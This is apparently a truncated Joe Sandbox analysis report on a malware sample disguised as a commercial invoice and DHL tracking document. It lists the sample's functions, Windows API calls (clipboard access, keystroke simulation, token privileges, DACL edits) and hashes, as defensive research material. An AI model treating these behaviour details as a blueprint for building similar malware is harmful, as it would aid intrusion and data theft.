Instruction Fuzzy Hash: 9AE08C71A0520CEBEB20CFBC8808AA977A8DB84321F444A54F91EC3280D5318A689694

Function 019A08B0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 019A08BB

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 586d62514981ebce8c41a91242ed021ed58bffebf0eccde5d7b23d354199d924
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 8AD0A73090620CEBCB10CFBD9C04ADA73ACDB04321F004754FD19D3281D636994497D5

Function 0044039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00440704,?,?,00000000,?,00440704,00000000,0000000C), ref: 004403B7

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 019f9e133589fd3687463b32f0c6bc3c70e2a4d6a7a21c8abd77c6802d23c41a
Instruction ID: 521aca0ec161b35fc7263a5d46959885f70ee066a467c01bc4f842704823e81c
Opcode Fuzzy Hash: 019f9e133589fd3687463b32f0c6bc3c70e2a4d6a7a21c8abd77c6802d23c41a
Instruction Fuzzy Hash: B2D06C3204010DBBDF028F84DD46EDA3BAAFB48714F014010BE1856020C732E821AB98

Function 00401CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00401CBC

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: ce1972e61f6ead1ed964811a17e374f6d7253294e9e64f6952c27d48b9b68509
Instruction ID: add4b1965ee0a1157e16c8a0766cb0da33b99116fe27ee521f6a6fd1a6c8daee
Opcode Fuzzy Hash: ce1972e61f6ead1ed964811a17e374f6d7253294e9e64f6952c27d48b9b68509
Instruction Fuzzy Hash: E2C092362C1314BFF2148B84BD9EF107764A368B10F448023FA0AA95F3C3E22820EA58

Function 0041FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 0041FD1F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: cb8fc1405275b7fd35930d776ca774b87ad7e16ce49f3ae074b720514b59c1ea
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: F8311874A00109DBD718CF59E4809AAF7A1FF49300B2482A6E80ACF751E735EDC6DBC9

Function 019A229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 019A22B1

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: fe480fbb3610e8489b8bf31d2aa979af77f65614d019b6dd56a9337c398ea06d
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: F2E0BF7494010EEFDB00EFA4D5496DE7BB4EF04311F1005A1FD05D7681DB309E548A62

Function 019A22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 019A22B1

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 9ee00714f6c7c54737d6b56bddb81d6a98394e7c9fc6aa51d80201d5f6e1ac1c
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: ECE0E67494010EDFDB00EFB4D54969E7FB4EF04301F100161FD05D2281D6309D508A72

Non-executed Functions

Function 00499576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00419BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00419BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0049961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0049965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0049969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004996C9
SendMessageW.USER32 ref: 004996F2
GetKeyState.USER32(00000011), ref: 0049978B
GetKeyState.USER32(00000009), ref: 00499798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004997AE
GetKeyState.USER32(00000010), ref: 004997B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004997E9
SendMessageW.USER32 ref: 00499810
SendMessageW.USER32(?,00001030,?,00497E95), ref: 00499918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0049992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00499941
SetCapture.USER32(?), ref: 0049994A
ClientToScreen.USER32(?,?), ref: 004999AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004999BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004999D6
ReleaseCapture.USER32 ref: 004999E1
GetCursorPos.USER32(?), ref: 00499A19
ScreenToClient.USER32(?,?), ref: 00499A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00499A80
SendMessageW.USER32 ref: 00499AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00499AEB
SendMessageW.USER32 ref: 00499B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00499B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00499B4A
GetCursorPos.USER32(?), ref: 00499B68
ScreenToClient.USER32(?,?), ref: 00499B75
GetParent.USER32(?), ref: 00499B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00499BFA
SendMessageW.USER32 ref: 00499C2B
ClientToScreen.USER32(?,?), ref: 00499C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00499CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00499CDE
SendMessageW.USER32 ref: 00499D01
ClientToScreen.USER32(?,?), ref: 00499D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00499D82

Part of subcall function 00419944: GetWindowLongW.USER32(?,000000EB), ref: 00419952

GetWindowLongW.USER32(?,000000F0), ref: 00499E05

Strings

@GUI_DRAGID, xrefs: 0049997D
F, xrefs: 00499D07
p#M, xrefs: 00499990

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#M
API String ID: 3429851547-3815028896
Opcode ID: 9acda88ef481f64dff2691987adc0f51729c3fbb8ee1b3f1175fb876a3806e9f
Instruction ID: 451fa1f71198719e719a83d051876cca88b8aaffde1248d9f209bff65fa2bb0d
Opcode Fuzzy Hash: 9acda88ef481f64dff2691987adc0f51729c3fbb8ee1b3f1175fb876a3806e9f
Instruction Fuzzy Hash: C8427A71204201AFDB24CF68CC94EAABFE5EF49314F14067EFA59872A1D735AC50CB5A

Function 00494873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004948F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00494908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00494927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0049494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0049495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0049497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004949AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004949D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00494A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00494A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00494A7E
IsMenu.USER32(?), ref: 00494A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00494AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00494B20
GetWindowLongW.USER32(?,000000F0), ref: 00494B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00494BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00494C82
wsprintfW.USER32 ref: 00494CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00494CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00494CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00494D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00494D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00494D5A

Strings

%d/%02d/%02d, xrefs: 00494CA8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: e993ef3c1ba993e3f0e3703c3bc1d51b196be1ef856bc2e73f65451efa31c41d
Instruction ID: 5eac038fe5f433155554c2c10b5bf9f2c42c8b1a3c0168f8d10ef8b7821d07a4
Opcode Fuzzy Hash: e993ef3c1ba993e3f0e3703c3bc1d51b196be1ef856bc2e73f65451efa31c41d
Instruction Fuzzy Hash: 8D12DE71600215ABEF248F25CC49FAF7FE8AF85314F10413AF915EA2E1DB789942CB58

Function 0041F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0041F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0045F474
IsIconic.USER32(00000000), ref: 0045F47D
ShowWindow.USER32(00000000,00000009), ref: 0045F48A
SetForegroundWindow.USER32(00000000), ref: 0045F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045F4AA
GetCurrentThreadId.KERNEL32 ref: 0045F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0045F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0045F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0045F4DE
SetForegroundWindow.USER32(00000000), ref: 0045F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0045F4F6
keybd_event.USER32(00000012,00000000), ref: 0045F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0045F50B
keybd_event.USER32(00000012,00000000), ref: 0045F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0045F519
keybd_event.USER32(00000012,00000000), ref: 0045F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0045F528
keybd_event.USER32(00000012,00000000), ref: 0045F52D
SetForegroundWindow.USER32(00000000), ref: 0045F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0045F557

Strings

Shell_TrayWnd, xrefs: 0045F46F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 89acd574fb6a0b7656c56520897254534c713e2cba09e691e399ff85dd037462
Instruction ID: 89da0c36e13a6727c88d70c3afad404323dbee3c10041995e1ca3f9583298dba
Opcode Fuzzy Hash: 89acd574fb6a0b7656c56520897254534c713e2cba09e691e399ff85dd037462
Instruction Fuzzy Hash: 2F319671A40318BBEB206BB55C8AFBF7E6CEB44B50F110077FA04E61D2D6B45D00AA69

Function 00461201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 004616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0046170D
Part of subcall function 004616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0046173A
Part of subcall function 004616C3: GetLastError.KERNEL32 ref: 0046174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00461286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004612A8
CloseHandle.KERNEL32(?), ref: 004612B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004612D1
GetProcessWindowStation.USER32 ref: 004612EA
SetProcessWindowStation.USER32(00000000), ref: 004612F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00461310

Part of subcall function 004610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004611FC), ref: 004610D4
Part of subcall function 004610BF: CloseHandle.KERNEL32(?,?,004611FC), ref: 004610E9

Strings

, xrefs: 0046125A
default, xrefs: 0046130B
ZL, xrefs: 00461392
winsta0, xrefs: 004612CC

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$ZL
API String ID: 22674027-2359302695
Opcode ID: 2abaf8f1418ce2004baa20a81eac4c80cc2ecef88659ecde7724807467f62c60
Instruction ID: a28069ea172d0e0229c1adbb0c91e81f8246f874796570f01ecfab716675dc87
Opcode Fuzzy Hash: 2abaf8f1418ce2004baa20a81eac4c80cc2ecef88659ecde7724807467f62c60
Instruction Fuzzy Hash: CE818F71900309AFDF109FA5DC49FEF7BB9EF04704F18412AF911A6260EB799944CB2A

Function 00460B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00461114
Part of subcall function 004610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 00461120
Part of subcall function 004610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 0046112F
Part of subcall function 004610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00460B9B,?,?,?), ref: 00461136
Part of subcall function 004610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0046114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00460BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00460C00
GetLengthSid.ADVAPI32(?), ref: 00460C17
GetAce.ADVAPI32(?,00000000,?), ref: 00460C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00460C6D
GetLengthSid.ADVAPI32(?), ref: 00460C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00460C8C
HeapAlloc.KERNEL32(00000000), ref: 00460C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00460CB4
CopySid.ADVAPI32(00000000), ref: 00460CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00460CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00460D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00460D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00460D45
HeapFree.KERNEL32(00000000), ref: 00460D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00460D55
HeapFree.KERNEL32(00000000), ref: 00460D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00460D65
HeapFree.KERNEL32(00000000), ref: 00460D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00460D78
HeapFree.KERNEL32(00000000), ref: 00460D7F

Part of subcall function 00461193: GetProcessHeap.KERNEL32(00000008,00460BB1,?,00000000,?,00460BB1,?), ref: 004611A1
Part of subcall function 00461193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00460BB1,?), ref: 004611A8
Part of subcall function 00461193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00460BB1,?), ref: 004611B7

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 6f1d1eab96d0e58d5600fe02c65cedcc1878308623e8f5026091cf664e7cad02
Instruction ID: fba8d662ddaae9df11d243ea9366e1dcc73a0a01e4a7c9837e69444c1501a4fc
Opcode Fuzzy Hash: 6f1d1eab96d0e58d5600fe02c65cedcc1878308623e8f5026091cf664e7cad02
Instruction Fuzzy Hash: 3D716E7190020AAFDF10DFE4DC85BAFBBB8BF15300F044626E915A7291E779A905CB69

Function 0047EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0049CC08), ref: 0047EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0047EB37
GetClipboardData.USER32(0000000D), ref: 0047EB43
CloseClipboard.USER32 ref: 0047EB4F
GlobalLock.KERNEL32(00000000), ref: 0047EB87
CloseClipboard.USER32 ref: 0047EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0047EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0047EBC9
GetClipboardData.USER32(00000001), ref: 0047EBD1
GlobalLock.KERNEL32(00000000), ref: 0047EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0047EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0047EC38
GetClipboardData.USER32(0000000F), ref: 0047EC44
GlobalLock.KERNEL32(00000000), ref: 0047EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0047EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0047EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0047ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0047ECF3
CountClipboardFormats.USER32 ref: 0047ED14
CloseClipboard.USER32 ref: 0047ED59

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 8fe17c3bab9062a7bed266275bca05752757c30c2a912ef8c1c6ccc1190608e1
Instruction ID: 447a503540a737e03ec4d46a85d158c84dc9abba7b119e26716bd7b04c4049c1
Opcode Fuzzy Hash: 8fe17c3bab9062a7bed266275bca05752757c30c2a912ef8c1c6ccc1190608e1
Instruction Fuzzy Hash: 6661F9352043019FD310EF25C888F6A7BA4AF58704F0486BFF45A972A1DB35ED05CB6A

Function 0047698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004769BE
FindClose.KERNEL32(00000000), ref: 00476A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00476A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00476A75

Part of subcall function 00409CB3: _wcslen.LIBCMT ref: 00409CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00476AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00476ADF

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00476B6A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00476B32
%03d, xrefs: 00476DA2
%02d, xrefs: 00476C00, 00476C0A, 00476C5A, 00476CAA, 00476CFA, 00476D4A
%4d, xrefs: 00476BB1

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 9d3135ad1febd28d754d82b35882d5ff40bf617c4c6234b86c455014bec0be7b
Instruction ID: 0bd16310d27d533a2d081857489bd4d1db209a6d1e6702d10dfe972364f7fd66
Opcode Fuzzy Hash: 9d3135ad1febd28d754d82b35882d5ff40bf617c4c6234b86c455014bec0be7b
Instruction Fuzzy Hash: BCD17871508340AFC710EBA5C881EAFB7ECAF98704F44492EF589D7191EB78EA44C766

Function 00479642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00479663
GetFileAttributesW.KERNEL32(?), ref: 004796A1
SetFileAttributesW.KERNEL32(?,?), ref: 004796BB
FindNextFileW.KERNEL32(00000000,?), ref: 004796D3
FindClose.KERNEL32(00000000), ref: 004796DE
FindFirstFileW.KERNEL32(*.*,?), ref: 004796FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0047974A
SetCurrentDirectoryW.KERNEL32(004C6B7C), ref: 00479768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00479772
